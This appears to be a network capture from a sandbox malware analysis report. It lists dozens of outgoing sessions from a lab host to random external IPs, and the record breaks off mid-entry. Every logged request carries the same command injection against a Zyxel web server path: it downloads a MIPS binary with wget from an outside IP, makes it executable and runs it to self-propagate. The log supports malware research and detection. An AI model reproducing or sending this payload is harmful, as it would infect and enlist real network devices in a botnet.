                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794612885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6273192.168.2.144357648.146.138.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794646978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6274192.168.2.1435298118.47.222.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794692993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6275192.168.2.143477437.83.183.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794759989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6276192.168.2.1459614175.167.92.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794790983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6277192.168.2.144570835.158.117.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794836044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6278192.168.2.1458712200.36.68.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794884920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6279192.168.2.1445766159.218.188.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794920921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6280192.168.2.1447724128.43.161.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794966936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6281192.168.2.1446502153.128.164.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794996977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6282192.168.2.144126892.213.79.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795056105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6283192.168.2.143286834.137.249.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795105934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6284192.168.2.1458162158.168.35.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795126915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6285192.168.2.1436472193.229.77.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795182943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6286192.168.2.145082448.43.136.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795214891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6287192.168.2.145196484.149.176.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795259953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6288192.168.2.1460870207.242.204.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795290947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6289192.168.2.1438680109.178.82.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795340061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6290192.168.2.1433498155.222.39.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795367002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6291192.168.2.1434202189.202.157.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795416117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6292192.168.2.1455444197.253.125.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795440912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6293192.168.2.145665090.186.127.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795485020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6294192.168.2.1449718145.174.28.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795528889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6295192.168.2.1454824143.39.111.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795571089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6296192.168.2.1448466123.217.104.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795603037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6297192.168.2.145909246.27.20.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795641899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6298192.168.2.145808239.134.105.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795669079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6299192.168.2.143342894.100.32.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795701981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6300192.168.2.144419682.139.113.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795738935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6301192.168.2.14391529.23.162.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795802116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6302192.168.2.143298088.131.170.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795844078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6303192.168.2.143831832.17.10.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795878887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6304192.168.2.1449222164.190.54.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795896053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6305192.168.2.145504245.147.81.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795953035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6306192.168.2.1456380160.168.227.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.795974970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6307192.168.2.144283884.158.216.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796015978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6308192.168.2.144370283.34.86.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796070099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6309192.168.2.1434096111.189.145.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796118021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6310192.168.2.1440182128.111.85.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796159983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6311192.168.2.1444632118.48.135.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796207905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6312192.168.2.1446040195.12.244.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796248913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6313192.168.2.1442448210.223.8.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796272039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6314192.168.2.1447228149.32.154.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796314955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6315192.168.2.1442922223.28.246.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796379089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6316192.168.2.1453560185.112.166.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796418905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6317192.168.2.145732470.32.133.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796449900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6318192.168.2.1435414143.19.77.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796513081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6319192.168.2.145937254.231.106.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796576023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6320192.168.2.1439822174.217.113.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796617031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6321192.168.2.1441936148.109.161.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796643019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6322192.168.2.1460472180.13.58.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796684980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6323192.168.2.144797863.42.61.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796720982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6324192.168.2.145392083.103.68.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796758890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6325192.168.2.14381965.77.97.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796832085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6326192.168.2.1436722219.127.6.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796870947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6327192.168.2.144401270.13.81.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796895981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6328192.168.2.144536653.205.20.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796925068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6329192.168.2.143330899.93.91.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796964884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6330192.168.2.143403451.51.23.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.796999931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6331192.168.2.1438004170.199.92.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797049999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6332192.168.2.145025235.7.100.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797086000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6333192.168.2.1449110186.151.142.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797112942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6334192.168.2.1437584105.54.208.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.797162056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6335192.168.2.1439624169.123.74.20443
                                                      TimestampBytes transferredDirectionData
